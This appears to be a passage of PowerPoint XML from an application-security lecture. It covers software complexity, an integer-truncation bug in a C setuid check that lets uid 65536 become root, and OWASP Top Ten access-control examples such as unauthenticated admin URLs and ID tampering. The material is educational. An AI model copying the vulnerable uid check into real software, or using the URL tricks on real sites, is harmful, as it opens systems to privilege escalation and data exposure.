              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0224AA3A-ED6E-29F6-4037-B5932258E6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040" y="1201339"/>
            <a:ext cx="3692128" cy="2740819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Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{803F9B6F-CF30-B6FA-7641-29514B6628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192" y="4304544"/>
            <a:ext cx="1218881" cy="316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2209" tIns="31105" rIns="62209" bIns="31105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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXI century</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="658699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9226B-D0D1-6B8F-6FEF-3FE8A941B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50"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Complexity kills security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8C5A5E-2987-17DA-474A-ED5089E1A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6B1786-0D48-0173-1006-4ACC4C34F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12</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="SysCallApache">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B130BA-2A87-6C19-F4CB-4FB5B31B7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" y="1290042"/>
            <a:ext cx="4297680" cy="300990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SysCallIIS">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841B095D-5410-5F5E-BA99-E2660F6D2B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90042"/>
            <a:ext cx="4290709" cy="300990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263365-7C4C-5447-1FF0-86F7797FB48F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2008760" y="4434666"/>
            <a:ext cx="4852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Which software would you prefer to maintain?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3F03E3-5395-4DB9-37B4-2FF72AA98A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137275" y="942528"/>
            <a:ext cx="400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Map of system calls in Apache web server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6E8196-5DD7-4EE4-AD18-09DB52B67BDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676437" y="955665"/>
            <a:ext cx="19768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 in IIS web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2466090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635762-B766-542B-E024-DA2DF525E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95B0E-77DF-C63B-19BC-38D4DB7E5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to avoid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9D8986-8BC0-36E0-BF19-CC267D96B8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208751-EF79-D1CE-4DD0-774EE1C56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B821C5-89F8-A995-385C-D15C5636D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13</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4CC2FF-5889-38B5-D8A0-78FB27E08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944" y="788194"/>
            <a:ext cx="5813822" cy="3998119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5BC05E3-1947-1005-BF9D-174EA30C8AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489347" y="1491630"/>
            <a:ext cx="2423427" cy="751907"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A complicated solution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76F091A-571C-23F1-5F2D-6D54510C2496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489346" y="2467915"/>
            <a:ext cx="2423427" cy="751907"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multiple possible points of failure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A40A8D08-945A-14B4-66CD-EAAA207AF5C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489345" y="3444200"/>
            <a:ext cx="2423427" cy="751907"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Catastrophic consequences</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389540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012FD-5B88-2167-2487-CABDD2F7B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50"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Three golden rules for system security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8955A59-8253-BEA0-A468-01C542BDE7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9163137"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251520" y="915566"/>
          <a:ext cx="8744843" cy="37264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2C339-4501-A823-0213-8CA93178C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BF64CF-FE8D-64DD-628E-DAF502B96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0259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D3A5AC-164D-F0CA-778F-FD5A6CC4D7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77F64-1A03-6057-487F-763FB0D26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99" cy="51435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F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software security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2CAAFC-C260-976F-FC5E-0A4E887D8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3874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6C97AE-D521-F162-CB8F-3FE3D7D26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8000DB-4C57-6994-69EB-7008778BB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16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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0429647-15E9-7EB1-580A-40CC306DA7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="251520" y="267494"/>
            <a:ext cx="5768280" cy="288032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95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72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ＭＳ Ｐゴシック" charset="-128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18859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2288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5717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29146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buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set_non_root_uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="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1500" b="1" kern="0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unsigned int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0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FontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0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FontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" i="1" kern="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GB" sz="1500" b="1" i="1" kern="0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// making sure that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" i="1" kern="0" dirty="0" err="1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uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" i="1" kern="0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is not 0 (root user) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="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GB" sz="1500" b="1" kern="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en-GB" sz="1500" b="1" kern="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1500" b="1" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == 0) {  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" b="1" i="1" kern="0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GB" sz="1500" b="1" kern="0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GB" sz="1500" b="1" kern="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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty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>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" b="1" kern="0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GB" sz="1500" b="1" kern="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GB" sz="1500" b="1" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="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1500" b="1" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="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GB" sz="1500" b="1" kern="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GB" sz="1500" b="1" kern="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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="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77E703A-B6D3-763C-72DC-41DB6D08BC45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="251519" y="3291830"/>
            <a:ext cx="8744843" cy="1273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95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72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ＭＳ Ｐゴシック" charset="-128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18859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2288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25717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2914650" indent="-17145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buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set_non_root_uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="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1400" kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="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kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="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kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="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kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0" dirty="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en-GB" sz="1400" b="1" i="1" kern="0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// 65536</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" i="1" kern="0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  <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0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en-GB" sz="1500" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="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kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="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kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="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kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" i="1" kern="0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 // 65536 != 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" i="1" kern="0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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" b="1" kern="0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GB" sz="1500" b="1" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" strike="sngStrike" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0" dirty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strike="sngStrike" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" strike="sngStrike" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="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kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="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kern="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="1" i="1" kern="0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// 0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21549E7-8F20-9464-105A-33AC974176E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6337105" y="485503"/>
            <a:ext cx="2304256" cy="100811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noProof="0" dirty="0"/>
              <a:t>Anything wrong with this code?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1293D0-D9F1-2C58-B06B-2127FF40D0B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156176" y="2139702"/>
            <a:ext cx="2666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kern="0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unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" kern="0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short</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" kern="0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int</a:t>
            </a:r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94C8B17-9D51-EA9D-C915-7254B37B563F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2125546" y="2308926"/>
            <a:ext cx="4030630" cy="154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484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EDBA4-77F3-184B-FCE3-EEA2BD0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D4AD59-67E2-F295-002B-9B60AA5AB8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551A4B-B30C-9A99-9A37-9BFE127BB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9F3C7C-E40F-3387-8795-1FA9CF5E8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17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0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0DC55CFA-F903-1DD2-F799-5F6797D2B0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147918"/>
            <a:ext cx="7306420" cy="489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C6491DE-D285-AA5E-F9CA-A2000685CDAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444208" y="300416"/>
            <a:ext cx="2304256" cy="100811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noProof="0" dirty="0"/>
              <a:t>Anything wrong with this code?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25040082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5952D-F0F4-9C04-661F-935FE9C34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Top Ten security flaws</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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6B68D-7F81-8DEC-E788-BD212E5620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203598"/>
            <a:ext cx="8384803" cy="358239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Broken Access Control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Cryptographic Failures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Injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(SQL Injection, command injection, cross-site scripting etc.)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Insecure Design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Security Misconfiguration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Vulnerable and Outdated Components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Identification and Authentication Failures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Software and Data Integrity Failures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Security Logging and Monitoring Failures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/>
              <a:t>Server-Side Request Forgery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F7C8E1-B5EF-5F9C-D141-0A0476EB0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063F1F-1205-AB72-BB33-58CEEC54C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18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-F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6B4C92C-45D1-809C-D622-29F4C91F6E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477" y="123478"/>
            <a:ext cx="1800339" cy="626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735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F950D-AAA8-1DEF-E161-B417AEDFA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flaw #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Access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A66BD-E6BB-1780-FB61-60CF76FC71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987574"/>
            <a:ext cx="8744843" cy="379842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Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://site.com/admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requires authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://site.com/admin/adduser?name=X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works without authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the ID gives access to someone else’s data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://shop.com/cart?id=413246</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF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https://shop.com/cart?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0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123456</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing access control for API access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive data exposed, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://site.com/.git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unprotected, “hidden” files/data, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://corp.com/internal/salaries.xls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300038" lvl="1" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://me.net/No/One/Will/Guess/82534/me.jpg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Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add missing authorization 🙂</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don‘t rely on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>“security by obscurity”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 🙈 – it doesn’t work!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754391-BD98-EAA1-72E7-F913D11FD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416A6E-52B6-76AB-8A55-F7650F9C8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7306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E1EFB-E1A3-2C34-A60B-2E68DCA06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50"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A quick dive into application security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06D26B-DBA6-A08F-6EE9-DA9FA259F1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8083" y="1131590"/>
            <a:ext cx="4800301" cy="331236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/>
              <a:t>Why?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Three golden rules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Software security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Penetration testing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Security analysis tools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Deployment security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C58984-458E-D6A4-CA80-144CE4518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0F8AB5-AB49-0F1B-A3D7-5348AEA04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E6F855-7D54-06B1-498B-3A3AFF274A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2732" y="1938789"/>
            <a:ext cx="660400" cy="6921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8E1ACA-C068-24C0-7E7B-DFD6E55A2B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7414" y="3561457"/>
            <a:ext cx="790575" cy="7397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8F4C65-AF05-40D5-5362-99788A4D04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117" y="1131590"/>
            <a:ext cx="828675" cy="7016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6843978-163C-984B-0A1B-5EF041BFC1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71117" y="2769369"/>
